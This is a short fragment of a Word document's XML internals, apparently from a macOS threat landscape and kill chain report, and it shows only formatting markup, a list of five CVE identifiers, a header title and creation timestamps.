        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-24201, CVE-2025-43529, CVE-2025-43530, CVE-2025-31199, CVE-2025-8672</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6"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">AMOSKYS  |  macOS Threat Landscape &amp; Kill Chain Analysis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509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2026-03-10T15:37:10.205Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-10T15:37:10.205Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>